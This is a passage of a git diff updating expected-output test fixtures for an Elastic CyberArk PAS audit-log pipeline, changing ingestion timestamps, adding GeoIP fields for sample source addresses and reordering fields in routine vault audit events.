"country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -781,7 +880,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101472Z", + "ingested": "2021-12-14T14:42:22.112539991Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -809,6 +908,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -854,7 +962,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101475500Z", + "ingested": "2021-12-14T14:42:22.112543409Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -882,6 +990,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -927,7 +1044,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101479900Z", + "ingested": "2021-12-14T14:42:22.112543883Z", "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -955,6 +1072,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -1000,7 +1126,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101485300Z", + "ingested": "2021-12-14T14:42:22.112544276Z", "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -1028,6 +1154,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -1073,7 +1208,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101490600Z", + "ingested": "2021-12-14T14:42:22.112544666Z", "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -1101,6 +1236,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -1146,7 +1290,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101494300Z", + "ingested": "2021-12-14T14:42:22.112545063Z", "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json index f340629aac8..4d286cf995b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json 
@@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection start", - "ingested": "2021-12-09T13:36:57.093060600Z", + "ingested": "2021-12-14T14:42:24.476645601Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e326\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection Start\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection Start\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection Start\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"326\",\"Desc\":\"CPM Auto-detection Start\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection Start\",\"GatewayStation\":\"\"}}}", "code": "326", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json index 89ba47c48c9..7cdce0f5989 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json 
@@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection end", - "ingested": "2021-12-09T13:36:57.215852200Z", + "ingested": "2021-12-14T14:42:24.600468735Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e327\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection End\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection End\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection End\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"327\",\"Desc\":\"CPM Auto-detection End\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection End\",\"GatewayStation\":\"\"}}}", "code": "327", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json index 62613abab1e..b728b99f3d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -52,7 +61,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329023500Z", + "ingested": "2021-12-14T14:42:24.744164762Z", "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -80,6 +89,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -125,7 +143,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329031900Z", + "ingested": "2021-12-14T14:42:24.744169235Z", "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -153,6 +171,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -198,7 +225,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329037500Z", + "ingested": "2021-12-14T14:42:24.744169913Z", "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -226,6 +253,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -271,7 +307,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329042900Z", + "ingested": "2021-12-14T14:42:24.744170545Z", "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -299,6 +335,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -344,7 +389,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329048300Z", + "ingested": "2021-12-14T14:42:24.744171014Z", "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -372,6 +417,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -417,7 +471,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329053800Z", + "ingested": "2021-12-14T14:42:24.744171423Z", "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -445,6 +499,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -491,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329059300Z", + "ingested": "2021-12-14T14:42:24.744171810Z", "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update 
Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json index b59939c142f..cbf0d77c9d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor license expiration date start", - "ingested": "2021-12-09T13:36:58.163764700Z", + "ingested": "2021-12-14T14:42:25.850749485Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"355\",\"Desc\":\"Monitor License Expiration Date start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date start\",\"GatewayStation\":\"\"}}}", "code": "355", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json index 319f3cfcc3a..977b312fc25 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", 
